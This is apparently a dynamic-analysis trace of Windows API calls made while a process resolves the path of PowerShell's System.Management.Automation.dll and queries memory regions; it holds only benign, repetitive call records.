	[0411.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.963] VirtualQuery (in: lpAddress=0x20bd30, lpBuffer=0x20cbf0, dwLength=0x30 | out: lpBuffer=0x20cbf0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.965] VirtualQuery (in: lpAddress=0x20bd30, lpBuffer=0x20cbf0, dwLength=0x30 | out: lpBuffer=0x20cbf0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.966] VirtualQuery (in: lpAddress=0x20bd30, lpBuffer=0x20cbf0, dwLength=0x30 | out: lpBuffer=0x20cbf0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.967] VirtualQuery (in: lpAddress=0x20bd30, lpBuffer=0x20cbf0, dwLength=0x30 | out: lpBuffer=0x20cbf0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.967] VirtualQuery (in: lpAddress=0x20b420, lpBuffer=0x20c2e0, dwLength=0x30 | out: lpBuffer=0x20c2e0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.967] VirtualQuery (in: lpAddress=0x20b4b0, lpBuffer=0x20c370, dwLength=0x30 | out: lpBuffer=0x20c370*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.968] VirtualQuery (in: lpAddress=0x20bb90, lpBuffer=0x20ca50, dwLength=0x30 | out: lpBuffer=0x20ca50*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.232] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.242] VirtualQuery (in: lpAddress=0x20bb90, lpBuffer=0x20ca50, dwLength=0x30 | out: lpBuffer=0x20ca50*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.243] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.243] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.244] VirtualQuery (in: lpAddress=0x20bb90, lpBuffer=0x20ca50, dwLength=0x30 | out: lpBuffer=0x20ca50*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.244] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.244] VirtualQuery (in: lpAddress=0x20bb90, lpBuffer=0x20ca50, dwLength=0x30 | out: lpBuffer=0x20ca50*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.245] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.245] VirtualQuery (in: lpAddress=0x20bb90, lpBuffer=0x20ca50, dwLength=0x30 | out: lpBuffer=0x20ca50*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.246] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.246] VirtualQuery (in: lpAddress=0x20b860, lpBuffer=0x20c720, dwLength=0x30 | out: lpBuffer=0x20c720*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.246] VirtualQuery (in: lpAddress=0x20bb90, lpBuffer=0x20ca50, dwLength=0x30 | out: lpBuffer=0x20ca50*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.247] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.247] VirtualQuery (in: lpAddress=0x20bb90, lpBuffer=0x20ca50, dwLength=0x30 | out: lpBuffer=0x20ca50*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.247] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.247] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x635af3c1, Data2=0x8026, Data3=0x4904, Data4=([0]=0xb7, [1]=0xa9, [2]=0x66, [3]=0x48, [4]=0x13, [5]=0x32, [6]=0x19, [7]=0x9a))) returned 0x0
	[0412.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
